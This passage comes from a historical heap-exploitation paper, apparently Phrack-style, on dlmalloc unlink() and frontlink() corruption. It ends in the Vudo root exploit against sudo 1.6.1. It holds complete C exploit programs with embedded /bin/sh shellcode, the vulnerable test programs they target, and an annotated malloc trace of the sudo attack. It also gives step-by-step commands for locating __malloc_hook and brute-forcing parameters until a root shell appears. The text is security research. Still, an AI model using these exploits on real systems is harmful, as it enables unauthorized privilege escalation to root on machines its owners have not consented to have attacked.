shellcode stored 8 (2*4) bytes after the beginning of the first buffer (the first 8 bytes of this buffer correspond to the fd and bk fields of the associated boundary tag and are overwritten at line[4], by frontlink() during the step[4.3] of the free(3) algorithm). Since the shellcode is executed in the heap, this exploit will work against systems protected with the Linux kernel patch from the Openwall Project, but not against systems protected with the Linux kernel patch from the PaX Team: http://www.openwall.com/linux/ http://pageexec.virtualave.net/ $ objdump -R vulnerable | grep free 0804951c R_386_JUMP_SLOT free $ ltrace ./vulnerable 2>&1 | grep 666 malloc(666) = 0x080495e8 $ set -o noclobber && cat > exploit.c << EOF #include #include #define FUNCTION_POINTER ( 0x0804951c ) #define CODE_ADDRESS ( 0x080495e8 + 2*4 ) #define VULNERABLE "./vulnerable" #define DUMMY 0xdefaced #define PREV_INUSE 0x1 char shellcode[] = /* the jump instruction */ "\xeb\x0appssssffff" /* the Aleph One shellcode */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main( void ) { char * p; char argv1[ 680 + 1 ]; char * argv[] = { VULNERABLE, argv1, NULL }; p = argv1; /* the fd field of the first chunk */ *( (void **)p ) = (void *)( DUMMY ); p += 4; /* the bk field of the first chunk */ *( (void **)p ) = (void *)( DUMMY ); p += 4; /* the special shellcode */ memcpy( p, shellcode, strlen(shellcode) ); p += strlen( shellcode ); /* the padding */ memset( p, 'B', (680 - 4*4) - (2*4 + strlen(shellcode)) ); p += ( 680 - 4*4 ) - ( 2*4 + strlen(shellcode) ); /* the prev_size field of the second chunk */ *( (size_t *)p ) = (size_t)( DUMMY & ~PREV_INUSE ); p += 4; /* the size field of the second chunk */ *( (size_t *)p ) = (size_t)( -4 ); p += 4; /* the fd field of the second chunk */ *( (void **)p ) = (void *)( FUNCTION_POINTER - 12 ); p += 4; /* the bk field of the second chunk */ *( (void **)p ) = (void *)( CODE_ADDRESS ); p += 4; /* the terminating NUL character */ *p = '\0'; /* the execution of the vulnerable program */ execve( argv[0], argv, NULL ); return( -1 ); } EOF $ make exploit cc exploit.c -o exploit $ ./exploit bash$ ------[ 3.6.2 - The frontlink() technique ]----------------------------- --------[ 3.6.2.1 - Concept ]------------------------------------------- Alternatively an attacker can exploit the frontlink() macro in order to abuse programs which mistakenly manage the heap. The frontlink() technique is less flexible and more difficult to implement than the unlink() technique, however it may be an interesting option since its preconditions are different. Although no exploit is known to apply this frontlink() technique in the wild, a proof of concept is presented in 3.6.2.2, and it was one of the possible techniques against the Sudo vulnerability. #define frontlink( A, P, S, IDX, BK, FD ) { \ if ( S < MAX_SMALLBIN_SIZE ) { \ IDX = smallbin_index( S ); \ mark_binblock( A, IDX ); \ BK = bin_at( A, IDX ); \ FD = BK->fd; \ P->bk = BK; \ P->fd = FD; \ FD->bk = BK->fd = P; \ [1] } else { \ IDX = bin_index( S ); \ BK = bin_at( A, IDX ); \ FD = BK->fd; \ if ( FD == BK ) { \ mark_binblock(A, IDX); \ } else { \ [2] while ( FD != BK && S < chunksize(FD) ) { \ [3] FD = FD->fd; \ } \ [4] BK = FD->bk; \ } \ P->bk = BK; \ P->fd = FD; \ [5] FD->bk = BK->fd = P; \ } \ } If the free chunk P processed by frontlink() is not a small chunk, the code at line[1] is executed, and the proper doubly-linked list of free chunks is traversed (at line[2]) until the place where P should be inserted is found. If the attacker managed to overwrite the forward pointer of one of the traversed chunks (read at line[3]) with the address of a carefully crafted fake chunk, they could trick frontlink() into leaving the loop[2] while FD points to this fake chunk. Next the back pointer BK of that fake chunk would be read (at line[4]) and the integer located at BK plus 8 bytes (8 is the offset of the fd field within a boundary tag) would be overwritten with the address of the chunk P (at line[5]). The attacker could store the address of a function pointer (minus 8 bytes of course) in the bk field of the fake chunk, and therefore trick frontlink() into overwriting (at line[5]) this function pointer with the address of the chunk P (but unfortunately not with the address of their choosing). Moreover, the attacker should store valid machine code at that address since their final purpose is to execute arbitrary code the next time the function pointed to by the overwritten integer is called. But the address of the free chunk P corresponds to the beginning of the associated boundary tag, and therefore to the location of its prev_size field. So is it really possible to store machine code in prev_size? - If the heap layout around prev_size evolved between the moment the frontlink() attack took place and the moment the function pointed to by the overwritten integer is called, the 4 bytes that were corresponding to the prev_size field could henceforth correspond to the very middle of an allocated chunk controlled by the attacker, and could therefore correspond to the beginning of a classic shellcode. - But if the heap layout did not evolve, the attacker may still store valid machine code in the prev_size field of the chunk P. Indeed, this prev_size field is not used by dlmalloc and could therefore hold user data (as mentioned in 3.3.3), since the chunk of memory located immediately before the chunk P is allocated (it would otherwise have been consolidated with the free chunk P before the evil frontlink() call). -- If the content and size of this previous chunk are controlled by the attacker, they also control the content of the trailing prev_size field (the prev_size field of the chunk P). Indeed, if the size argument passed to malloc(3) or realloc(3) is a multiple of 8 bytes minus 4 bytes (as detailed in 3.3.1), the trailing prev_size field will probably hold user data, and the attacker can therefore store a jump instruction there. This jump instruction could, once executed, simply branch to a classic shellcode located just before the prev_size field. This technique is used in 3.6.2.2. -- But even if the content or size of the chunk located before the chunk P is not controlled by the attacker, they might be able to store valid machine code in the prev_size field of P. Indeed, if they managed to store machine code in the 4 bytes corresponding to this prev_size field before the heap layout around prev_size was fixed (the attacker could for example allocate a buffer that would cover the prev_size field-to-be and store machine code there), and if the content of that prev_size field was not destroyed (for example, a call to malloc(3) with a size argument of 16 reserves 20 bytes for the caller, and the last 4 bytes (the trailing prev_size field) are therefore never overwritten by the caller) at the time the function pointed to by the integer overwritten during the frontlink() attack is called, the machine code would be executed and could simply branch to a classic shellcode. --------[ 3.6.2.2 - Proof of concept ]---------------------------------- The program below is vulnerable to a buffer overflow: although the attacker cannot overflow (at line[7]) the first buffer allocated dynamically in the heap (at line[1]) with the content of argv[2] (since the size of this first buffer is exactly the size of argv[2]), however they can overflow (at line[9]) the fourth buffer allocated dynamically in the heap (at line[4]) with the content of argv[1]. The size of the memory area reserved for the user within the fourth chunk is equal to 668 (request2size(666) - 4) bytes (as calculated in 3.6.1.2), so if the size of argv[1] is greater than or equal to 676 (668 + 2*4) bytes, the attacker can overwrite the size and fd fields of the next contiguous boundary tag. $ set -o noclobber && cat > vulnerable.c << EOF #include #include int main( int argc, char * argv[] ) { char * first, * second, * third, * fourth, * fifth, * sixth; /*[1]*/ first = malloc( strlen(argv[2]) + 1 ); /*[2]*/ second = malloc( 1500 ); /*[3]*/ third = malloc( 12 ); /*[4]*/ fourth = malloc( 666 ); /*[5]*/ fifth = malloc( 1508 ); /*[6]*/ sixth = malloc( 12 ); /*[7]*/ strcpy( first, argv[2] ); /*[8]*/ free( fifth ); /*[9]*/ strcpy( fourth, argv[1] ); /*[0]*/ free( second ); return( 0 ); } EOF $ make vulnerable cc vulnerable.c -o vulnerable $ ./vulnerable `perl -e 'print "B" x 1337'` dummy Segmentation fault (core dumped) The six buffers used by this program are allocated dynamically (at line[1], line[2], line[3], line[4], line[5] and line[6]) during the step[4] of the malloc(3) algorithm, and the second buffer is therefore located immediately after the first one, the third one after the second one, and so on. The attacker can therefore overwrite (at line[9]) the boundary tag associated with the fifth chunk (allocated at line[5] and freed at line[8]) since this chunk is located immediately after the overflowed fourth buffer. Unfortunately the only call to one of the dlmalloc routines after the overflow at line[9] is the call to free(3) at line[0]. In order to free the second buffer, the step[4] of the free(3) algorithm is carried out, but the unlink() macro is neither called at step[4.1], nor at step[4.2], since the chunks of memory that border the second chunk (the first and third chunks) are allocated (and the corrupted boundary tag of the fifth chunk is not even read during the step[4.1] or step[4.2] of the free(3) algorithm). Therefore the attacker cannot exploit the unlink() technique during the free(3) call at line[0], but should exploit the frontlink() (called at step[4.3] of the free(3) algorithm) technique instead. Indeed, the fd field of the corrupted boundary tag associated with the fifth chunk is read (at line[3] in the frontlink() macro) during this call to frontlink(), since the second chunk should be inserted in the doubly-linked list of the bin number 79 (as detailed in 3.4.1, because the effective size of this chunk is equal to 1504 (request2size(1500))), since the fifth chunk was inserted in this very same doubly-linked list at line[8] (as detailed in 3.4.1, because the effective size of this chunk is equal to 1512 (request2size(1508))), and since the second chunk should be inserted after the fifth chunk in that list (1504 is indeed less than 1512, and the chunks in each list are maintained in decreasing sorted order by size, as mentioned in 3.4.2). The exploit below overflows the fourth buffer and overwrites the fd field of the fifth chunk with the address of a fake chunk stored in the environment variables passed to the vulnerable program. The size field of this fake chunk is set to 0 in order to trick free(3) into leaving the loop[2] of the frontlink() macro while FD points to that fake chunk, and in the bk field of the fake chunk is stored the address (minus 8 bytes) of the first function pointer emplacement in the .dtors section: http://www.synnergy.net/downloads/papers/dtors.txt This function pointer, overwritten by frontlink() with the address of the second chunk, is read and executed at the end of the vulnerable program. Since the attacker can control (via argv[2]) the content and size of the chunk located immediately before the second chunk (the first chunk), they can use one of the methods described in 3.6.2.1 in order to store valid machine code in the prev_size field of the second chunk. In the exploit below, the size of the second argument passed to the vulnerable program (argv[2]) is a multiple of 8 bytes minus 4 bytes, and is greater than or equal to the size of the special shellcode used by the exploit. The last 4 bytes of this special shellcode (including the terminating NUL character) are therefore stored in the last 4 bytes of the first buffer (the prev_size field of the second chunk) and correspond to a jump instruction that simply executes a classic shellcode stored right before. Since the size of argv[2] should be equal to a multiple of 8 bytes minus 4 bytes, and since this size should also be greater than or equal to the size of the special shellcode, the size of argv[2] is simply equal to ((((sizeof(shellcode) + 4) + 7) & ~7) - 4), which is equivalent to (request2size(sizeof(shellcode)) - 4). The size of the special shellcode in the exploit below is equal to 49 bytes, and the size of argv[2] is therefore equal to 52 (request2size(49) - 4) bytes. $ objdump -j .dtors -s vulnerable | grep ffffffff 80495a8 ffffffff 00000000 ........ $ set -o noclobber && cat > exploit.c << EOF #include #include #include #define FUNCTION_POINTER ( 0x80495a8 + 4 ) #define VULNERABLE "./vulnerable" #define FAKE_CHUNK ( (0xc0000000 - 4) - sizeof(VULNERABLE) - (16 + 1) ) #define DUMMY 0xeffaced char shellcode[] = /* the Aleph One shellcode */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh" /* the jump instruction */ "\xeb\xd1p"; int main( void ) { char * p; char argv1[ 676 + 1 ]; char argv2[ 52 ]; char fake_chunk[ 16 + 1 ]; size_t size; char ** envp; char * argv[] = { VULNERABLE, argv1, argv2, NULL }; p = argv1; /* the padding */ memset( p, 'B', 676 - 4 ); p += 676 - 4; /* the fd field of the fifth chunk */ *( (void **)p ) = (void *)( FAKE_CHUNK ); p += 4; /* the terminating NUL character */ *p = '\0'; p = argv2; /* the padding */ memset( p, 'B', 52 - sizeof(shellcode) ); p += 52 - sizeof(shellcode); /* the special shellcode */ memcpy( p, shellcode, sizeof(shellcode) ); p = fake_chunk; /* the prev_size field of the fake chunk */ *( (size_t *)p ) = (size_t)( DUMMY ); p += 4; /* the size field of the fake chunk */ *( (size_t *)p ) = (size_t)( 0 ); p += 4; /* the fd field of the fake chunk */ *( (void **)p ) = (void *)( DUMMY ); p += 4; /* the bk field of the fake chunk */ *( (void **)p ) = (void *)( FUNCTION_POINTER - 8 ); p += 4; /* the terminating NUL character */ *p = '\0'; /* the size of the envp array */ size = 0; for ( p = fake_chunk; p < fake_chunk + (16 + 1); p++ ) { if ( *p == '\0' ) { size++; } } size++; /* the allocation of the envp array */ envp = malloc( size * sizeof(char *) ); /* the content of the envp array */ size = 0; for ( p = fake_chunk; p < fake_chunk + (16+1); p += strlen(p)+1 ) { envp[ size++ ] = p; } envp[ size ] = NULL; /* the execution of the vulnerable program */ execve( argv[0], argv, envp ); return( -1 ); } EOF $ make exploit cc exploit.c -o exploit $ ./exploit bash$ --[ 4 - Exploiting the Sudo vulnerability ]----------------------------- ----[ 4.1 - The theory ]------------------------------------------------ In order to exploit the Sudo vulnerability, and as mentioned in 2.4, an attacker should overwrite a byte of the boundary tag located immediately after the end of the msg buffer, and should take advantage of this erroneously overwritten byte before it is restored. Indeed, the exploit provided in 4.2 tricks do_syslog() into overwriting (at line[5] in do_syslog()) a byte of the bk pointer associated with this next contiguous boundary tag, tricks malloc(3) into following (at step[3] in malloc(3)) this corrupted back pointer to a fake chunk of memory, and tricks malloc(3) into taking (at step[3.2] in malloc(3)) this fake chunk off its imaginary doubly linked-list. The attacker can therefore apply the unlink() technique presented in 3.6.1 and eventually execute arbitrary code as root. How these successive tricks are actually accomplished is presented below via a complete, successful, and commented run of the Vudo exploit (the dlmalloc calls traced below were performed by Sudo, and were obtained via a special shared library stored in /etc/ld.so.preload): $ ./vudo 0x002531dc 62595 6866 malloc( 9 ): 0x0805e480; malloc( 7 ): 0x0805e490; malloc( 6 ): 0x0805e4a0; malloc( 5 ): 0x0805e4b0; malloc( 36 ): 0x0805e4c0; malloc( 18 ): 0x0805e4e8; malloc( 14 ): 0x0805e500; malloc( 10 ): 0x0805e518; malloc( 5 ): 0x0805e528; malloc( 19 ): 0x0805e538; malloc( 3 ): 0x0805e550; malloc( 62596 ): 0x0805e560; This 62596 bytes buffer was allocated by the tzset(3) function (called by Sudo at the beginning of the init_vars() function) and is a simple copy of the TZ environment variable, whose size was provided by the attacker via the second argument passed to the Vudo exploit (62596 is indeed equal to 62595 plus 1, the size of a terminating NUL character). The usefulness of such a huge dynamically allocated buffer is detailed later on, but proved to be essential to the Vudo exploit. For example, this exploit will never work against the Debian operating system since the tzset(3) function used by Debian does not read the value of the TZ environment variable when a SUID or SGID program is run. malloc( 176 ): 0x0806d9e8; free( 0x0806d9e8 ); malloc( 17 ): 0x0806d9e8; malloc( 6 ): 0x0806da00; malloc( 4096 ): 0x0806da10; malloc( 6 ): 0x0806ea18; malloc( 1024 ): 0x0806ea28; malloc( 176 ): 0x0806ee30; malloc( 8 ): 0x0806eee8; malloc( 120 ): 0x0806eef8; malloc( 15 ): 0x0806ef78; malloc( 38 ): 0x0806ef90; malloc( 40 ): 0x0806efc0; malloc( 36 ): 0x0806eff0; malloc( 15 ): 0x0806f018; malloc( 38 ): 0x0806f030; malloc( 40 ): 0x0806f060; malloc( 36 ): 0x0806f090; malloc( 14 ): 0x0806f0b8; malloc( 38 ): 0x0806f0d0; malloc( 40 ): 0x0806f100; malloc( 36 ): 0x0806f130; malloc( 14 ): 0x0806f158; malloc( 38 ): 0x0806f170; malloc( 40 ): 0x0806f1a0; malloc( 36 ): 0x0806f1d0; malloc( 36 ): 0x0806f1f8; malloc( 19 ): 0x0806f220; malloc( 40 ): 0x0806f238; malloc( 38 ): 0x0806f268; malloc( 15 ): 0x0806f298; malloc( 38 ): 0x0806f2b0; malloc( 17 ): 0x0806f2e0; malloc( 38 ): 0x0806f2f8; malloc( 17 ): 0x0806f328; malloc( 38 ): 0x0806f340; malloc( 18 ): 0x0806f370; malloc( 38 ): 0x0806f388; malloc( 12 ): 0x0806f3b8; malloc( 38 ): 0x0806f3c8; malloc( 17 ): 0x0806f3f8; malloc( 38 ): 0x0806f410; malloc( 17 ): 0x0806f440; malloc( 40 ): 0x0806f458; malloc( 18 ): 0x0806f488; malloc( 40 ): 0x0806f4a0; malloc( 18 ): 0x0806f4d0; malloc( 38 ): 0x0806f4e8; malloc( 40 ): 0x0806f518; malloc( 16 ): 0x0806f548; malloc( 38 ): 0x0806f560; malloc( 40 ): 0x0806f590; free( 0x0806eef8 ); free( 0x0806ee30 ); malloc( 16 ): 0x0806eef8; malloc( 8 ): 0x0806ef10; malloc( 12 ): 0x0806ef20; malloc( 23 ): 0x0806ef30; calloc( 556, 1 ): 0x0806f5c0; malloc( 26 ): 0x0806ef50; malloc( 23 ): 0x0806ee30; malloc( 12 ): 0x0806ee50; calloc( 7, 16 ): 0x0806ee60; malloc( 176 ): 0x0806f7f0; free( 0x0806f7f0 ); malloc( 28 ): 0x0806f7f0; malloc( 5 ): 0x0806eed8; malloc( 11 ): 0x0806f810; malloc( 4095 ): 0x0806f820; This 4095 bytes buffer was allocated by the sudo_getpwuid() function, and is a simple copy of the SHELL environment variable provided by the Vudo exploit. Since Sudo was called with the -s option (the usefulness of this option is detailed subsequently), the size of the SHELL environment variable (including the trailing NUL character) cannot exceed 4095 bytes because of a check performed at the beginning of the find_path() function called by Sudo. The SHELL environment variable constructed by the exploit is exclusively composed of pointers indicating a single location on the stack, whose address does not contain any NUL byte (0xbfffff1e in this case). The reasons behind the choice of this particular address are exposed below. malloc( 1024 ): 0x08070828; malloc( 16 ): 0x08070c30; malloc( 8 ): 0x08070c48; malloc( 176 ): 0x08070c58; free( 0x08070c58 ); malloc( 35 ): 0x08070c58; The next series of dlmalloc calls is performed by the load_interfaces() function, and is one of the keys to a successful exploitation of the Sudo vulnerability: malloc( 8200 ): 0x08070c80; malloc( 16 ): 0x08072c90; realloc( 0x08072c90, 8 ): 0x08072c90; free( 0x08070c80 ); The 8200 bytes buffer and the 16 bytes buffer were allocated during the step[4] in malloc(3), and the latter (even once reallocated) was therefore stored immediately after the former. Moreover, a hole was created in the heap since the 8200 bytes buffer was freed during the step[4.3] of the free(3) algorithm. malloc( 2004 ): 0x08070c80; malloc( 176 ): 0x08071458; malloc( 4339 ): 0x08071510; The 2004 bytes buffer was allocated by the init_vars() function (because Sudo was called with the -s option) in order to hold pointers to the command and arguments to be executed by Sudo (provided by the Vudo exploit). This buffer was stored at the beginning of the previously freed 8200 bytes buffer, during the step[3.1] in malloc(3). The 176 and 4339 bytes buffers were allocated during the step[2.1] in malloc(3), and stored immediately after the end of the 2004 bytes buffer allocated above (the 4339 bytes buffer was created in order to hold the command and arguments to be executed by Sudo (provided by the exploit)). The next series of dlmalloc calls is performed by the setenv(3) function in order to create the SUDO_COMMAND environment variable: realloc( 0x00000000, 27468 ): 0x08072ca8; malloc( 4352 ): 0x080797f8; malloc( 16 ): 0x08072608; The 27468 bytes buffer was allocated by setenv(3) in order to hold pointers to the environment variables passed to Sudo by the exploit (the number of environment variables passed to Sudo was provided by the attacker (the third argument passed to the Vudo exploit)). Because of the considerable size of this buffer, it was allocated at step[4] in malloc(3), after the end of the 8 bytes buffer located immediately after the remainder of the 8200 bytes hole. The 4352 bytes buffer, the SUDO_COMMAND environment variable (whose size is equal to the size of the previously allocated 4339 bytes buffer, plus the size of the SUDO_COMMAND= prefix), was allocated at step[4] in malloc(3), and was therefore stored immediately after the end of the 27468 bytes buffer allocated above. The 16 bytes buffer was allocated at step[3.1] in malloc(3), and is therefore located immediately after the end of the 4339 bytes buffer, in the remainder of the 8200 bytes hole. free( 0x08071510 ); The 4339 bytes buffer was freed, at step[4.3] in free(3), and therefore created a hole in the heap (the allocated buffer stored before this hole is the 176 bytes buffer whose address is 0x08071458, the allocated buffer stored after this hole is the 16 bytes buffer whose address is 0x08072608). The next series of dlmalloc calls is performed by the setenv(3) function in order to create the SUDO_USER environment variable: realloc( 0x08072ca8, 27472 ): 0x0807a900; malloc( 15 ): 0x08072620; malloc( 16 ): 0x08072638; The previously allocated 27468 bytes buffer was reallocated for additional space, but since it could not be extended (a too small free chunk was stored before (the remainder of the 8200 bytes hole) and an allocated chunk was stored after (the 4352 bytes buffer)), it was freed at step[5.4.2] in realloc(3) (a new hole was therefore created in the heap) and another chunk was allocated at step[5.4] in realloc(3). The 15 bytes buffer was allocated, during the step[3.1] in malloc(3), after the end of the 16 bytes buffer allocated above (whose address is equal to 0x08072608). The 16 bytes buffer was allocated, during the step[2.1] in malloc(3), after the end of the 15 bytes buffer allocated above (whose address is 0x08072620). The next series of dlmalloc calls is performed by the setenv(3) function in order to create the SUDO_UID and SUDO_GID environment variables: realloc( 0x0807a900, 27476 ): 0x0807a900; malloc( 13 ): 0x08072650; malloc( 16 ): 0x08072668; realloc( 0x0807a900, 27480 ): 0x0807a900; malloc( 13 ): 0x08072680; malloc( 16 ): 0x08072698; The 13, 16, 13 and 16 bytes buffers were allocated after the end of the 16 bytes buffer allocated above (whose address is 0x08072638), in the remainder of the 8200 bytes hole. The address of the resulting `last_remainder' chunk, the free chunk stored after the end of the 0x08072698 buffer and before the 0x08072c90 buffer, is equal to 0x080726a8 (mem2chunk(0x08072698) + request2size(16)), and its effective size is equal to 1504 (mem2chunk(0x08072c90) - 0x080726a8) bytes. The next series of dlmalloc calls is performed by the setenv(3) function in order to create the PS1 environment variable: realloc( 0x0807a900, 27484 ): 0x0807a900; malloc( 1756 ): 0x08071510; malloc( 16 ): 0x08071bf0; The 1756 bytes buffer was allocated (during the step[3.1] in malloc(3)) in order to hold the PS1 environment variable (whose size was computed by the Vudo exploit), and was stored at the beginning of the 4339 bytes hole created above. The remainder of this hole therefore became the new `last_remainder' chunk, and the old `last_remainder' chunk, whose effective size is equal to 1504 bytes, was therefore placed in its doubly-linked list (the list associated with the bin number 79) during the step[2.2.2] in malloc(3). The 16 bytes buffer was allocated during the step[2.1] in malloc(3), in the remainder of the 4339 bytes hole. malloc( 640 ): 0x08071c08; malloc( 400 ): 0x08071e90; The 640 and 400 bytes buffers were also allocated, during the step[2.1] in malloc(3), in the remainder of the 4339 bytes hole. malloc( 1600 ): 0x08072ca8; This 1600 bytes buffer, allocated at step[3.1] in malloc(3), was stored at the beginning of the 27468 bytes hole created above. The remainder of this huge hole therefore became the new `last_remainder' chunk, and the old `last_remainder' chunk, the remainder of the 4339 bytes hole, was placed in its bin at step[2.2.2] in malloc(3). Since the effective size of this old `last_remainder' chunk is equal to 1504 (request2size(4339) - request2size(1756) - request2size(16) - request2size(640) - request2size(400)) bytes, it was placed in the bin number 79 by frontlink(), in front of the 1504 bytes chunk already inserted in this bin as described above. The address of that old `last_remainder' chunk, 0x08072020 (mem2chunk(0x08071e90) + request2size(400)), contains two SPACE characters, needed by the Vudo exploit in order to successfully exploit the Sudo vulnerability, as detailed below. This very special address was obtained thanks to the huge TZ environment variable mentioned above. malloc( 40 ): 0x080732f0; malloc( 16386 ): 0x08073320; malloc( 13 ): 0x08077328; free( 0x08077328 ); malloc( 5 ): 0x08077328; free( 0x08077328 ); malloc( 6 ): 0x08077328; free( 0x08071458 ); malloc( 100 ): 0x08077338; realloc( 0x08077338, 19 ): 0x08077338; malloc( 100 ): 0x08077350; realloc( 0x08077350, 21 ): 0x08077350; free( 0x08077338 ); free( 0x08077350 ); All these buffers were allocated, during the step[2.1] in malloc(3), in the remainder of the 27468 bytes hole created above. The next series of dlmalloc calls is performed by easprintf(), a wrapper to vasprintf(3), in order to allocate space for the msg buffer: malloc( 100 ): 0x08077338; malloc( 300 ): 0x080773a0; free( 0x08077338 ); malloc( 700 ): 0x080774d0; free( 0x080773a0 ); malloc( 1500 ): 0x080726b0; free( 0x080774d0 ); malloc( 3100 ): 0x08077338; free( 0x080726b0 ); malloc( 6300 ): 0x08077f58; free( 0x08077338 ); realloc( 0x08077f58, 4795 ): 0x08077f58; In order to allocate the 1500 bytes buffer, whose effective size is equal to 1504 (request2size(1500)) bytes, malloc(3) carried out the step[1.2] and returned (at step[1.2.2]) the last chunk in the bin number 79, and therefore left the 0x08072020 chunk alone in this bin. But once unused, this 1500 bytes buffer was placed back in the bin number 79 by free(3), at step[4.3], in front of the 0x08072020 chunk already stored in this bin. The 6300 bytes buffer was allocated during the step[2.2.1] in malloc(3). Indeed, the size of the 27468 bytes hole was carefully chosen by the attacker (via the third argument passed to the Vudo exploit) so that, once allocated, the 6300 bytes buffer would fill this hole. Finally, the 6300 bytes buffer was reallocated for less space, during the step[4.1] of the realloc(3) algorithm. The reallocated buffer was created in order to hold the msg buffer, and the free chunk processed by chunk_free() during the step[4.1] of the realloc(3) algorithm was placed in its doubly-linked list. Since the effective size of this free chunk is equal to 1504 (request2size(6300) - request2size(4795)) bytes, it was placed in the bin number 79, in front of the two free chunks already stored in this bin. The next series of dlmalloc calls is performed by the first call to syslog(3), during the execution of the do_syslog() function: malloc( 192 ): 0x08072028; malloc( 8192 ): 0x08081460; realloc( 0x08081460, 997 ): 0x08081460; free( 0x08072028 ); free( 0x08081460 ); The 192 bytes buffer was allocated during the step[3.1] of the malloc(3) algorithm, and the processed chunk was the last chunk in the bin number 79 (the 0x08072020 chunk). Once unused, the 192 bytes buffer was consolidated (at step[4.2] in free(3)) with the remainder of the previously split 1504 bytes chunk, and the resulting coalesced chunk was placed back (at step[4.3] in free(3)) in the bin number 79, in front of the two free chunks already stored in this bin. The bk field of the chunk of memory located immediately after the msg buffer was therefore overwritten by unlink() in order to point to the chunk 0x08072020. The next series of dlmalloc calls is performed by the second call to syslog(3), during the execution of the do_syslog() function: malloc( 192 ): 0x080726b0; malloc( 8192 ): 0x08081460; realloc( 0x08081460, 1018 ): 0x08081460; free( 0x080726b0 ); free( 0x08081460 ); The 192 bytes buffer was allocated during the step[3.1] of the malloc(3) algorithm, and the processed chunk was the last chunk in the bin number 79 (the 0x080726a8 chunk). The bk field of the bin number 79 (the pointer to the last free chunk in the associated doubly-linked list) was therefore overwritten by unlink() with a pointer to the chunk of memory located immediately after the end of the msg buffer. Once unused, the 192 bytes buffer was consolidated (at step[4.2] in free(3)) with the remainder of the previously split 1504 bytes chunk, and the resulting coalesced chunk was placed back (at step[4.3] in free(3)) in the bin number 79, in front of the two free chunks already stored in this bin. As soon as this second call to syslog(3) was completed, the loop[7] of the do_syslog() function pushed the pointer p after the terminating NUL character associated with the msg buffer, until p pointed to the first SPACE character encountered. This first encountered SPACE character was of course the least significant byte of the bk field (still equal to 0x08072020) associated with the chunk located immediately after msg. The do_syslog() function successfully passed the test[2] since no NUL byte was found between p and (p + MAXSYSLOGLEN) (indeed, this memory area is filled with the content of the previously allocated and freed 27468 bytes buffer: pointers to the environment variables passed to Sudo by the exploit, and these environment variables were constructed by the exploit in order to avoid NUL and SPACE characters in their addresses). The byte overwritten with a NUL byte at line[5] in do_syslog() is the first encountered SPACE character when looping from (p + MAXSYSLOGLEN) down to p. Of course, this first encountered SPACE character was the second byte of the bk field (equal to 0x08072020) associated with the chunk located immediately after msg, since no other SPACE character could be found in the memory area between p and (p + MAXSYSLOGLEN), as detailed above. The bk field of the chunk located immediately after msg was therefore corrupted (its new value is equal to 0x08070020), in order to point to the very middle of the copy the SHELL environment variable mentioned above, before the next series of dlmalloc calls, performed by the third call to syslog(3), were carried out: malloc( 192 ): 0x08079218; malloc( 8192 ): 0x08081460; realloc( 0x08081460, 90 ): 0x08081460; free( 0x08079218 ); free( 0x08081460 ); The 192 bytes buffer was allocated during the step[3.1] of the malloc(3) algorithm, and the processed chunk was the last chunk in the bin number 79 (the chunk located immediately after msg). The bk field of the bin number 79 (the pointer to the last free chunk in the associated doubly-linked list) was therefore overwritten by unlink() with the corrupted bk field of the chunk located immediately after msg. Once unused, the 192 bytes buffer was consolidated (at step[4.2] in free(3)) with the remainder of the previously split 1504 bytes chunk, and the resulting coalesced chunk was placed back (at step[4.3] in free(3)) in the bin number 79, in front of the two free chunks already stored in this bin (but one of these two chunks is of course a fake chunk pointed to by the corrupted bk field 0x08070020). Before the next series of dlmalloc calls is performed, by the fourth call to syslog(3), the erroneously overwritten SPACE character was restored at line[6] by do_syslog(), but since the corrupted bk pointer was copied to the bk field of the bin number 79 before, the Vudo exploit managed to permanently damage the internal structures used by dlmalloc: malloc( 192 ): 0xbfffff1e; malloc( 8192 ): In order to allocate the 192 bytes buffer, the step[1.2] of the malloc(3) algorithm was carried out, and an imaginary chunk of memory, pointed to by the corrupted bk field, stored in the very middle of the copy of the SHELL environment variable, was processed. But since this fake chunk was too small (indeed, its size field is equal to 0xbfffff1e, a negative integer), its bk field (equal to 0xbfffff1e) was followed, to another fake chunk of memory stored on the stack, whose size is exactly 200 (request2size(192)) bytes. This fake chunk was therefore taken off its imaginary doubly-linked list, allowing the attacker to apply the unlink() technique described in 3.6.1 and to overwrite the __malloc_hook debugging hook with the address of a special shellcode stored somewhere in the heap (in order to bypass the Linux kernel patch from the Openwall Project). This shellcode was subsequently executed, at the beginning of the last call to malloc(3), since the corrupted __malloc_hook debugging hook was read and executed. ----[ 4.2 - The practice ]---------------------------------------------- In order to successfully gain root privileges via the Vudo exploit, a user does not necessarily need to be present in the sudoers file, but has to know their user password. They need additionally to provide three command line arguments: - the address of the __malloc_hook function pointer, which varies from one system to another but can be determined; - the size of the tz buffer, which varies slightly from one system to another and has to be brute forced; - the size of the envp buffer, which varies slightly from one system to another and has to be brute forced. A typical Vudo cult^H^H^H^Hsession starts with an authentication step, a __malloc_hook computation step, and eventually a brute force step, based on the tz and envp examples provided by the Vudo usage message (fortunately the user does not need to provide their password each time Sudo is executed during the brute force step because they authenticated right before): $ /usr/bin/sudo www.MasterSecuritY.fr Password: maxx is not in the sudoers file. This incident will be reported. $ LD_TRACE_LOADED_OBJECTS=1 /usr/bin/sudo | grep /lib/libc.so.6 libc.so.6 => /lib/libc.so.6 (0x00161000) $ nm /lib/libc.so.6 | grep __malloc_hook 000ef1dc W __malloc_hook $ perl -e 'printf "0x%08x\n", 0x00161000 + 0x000ef1dc' 0x002501dc $ for tz in `seq 62587 8 65531` do for envp in `seq 6862 2 6874` do ./vudo 0x002501dc $tz $envp done done maxx is not in the sudoers file. This incident will be reported. maxx is not in the sudoers file. This incident will be reported. maxx is not in the sudoers file. This incident will be reported. maxx is not in the sudoers file. This incident will be reported. maxx is not in the sudoers file. This incident will be reported. maxx is not in the sudoers file. This incident will be reported. maxx is not in the sudoers file. This incident will be reported. maxx is not in the sudoers file. This incident will be reported. maxx is not in the sudoers file. This incident will be reported. maxx is not in the sudoers file. This incident will be reported. bash# <++> vudo.c !32ad14e5 /* * vudo.c versus Red Hat Linux/Intel 6.2 (Zoot) sudo-1.6.1-1 * Copyright (C) 2001 Michel 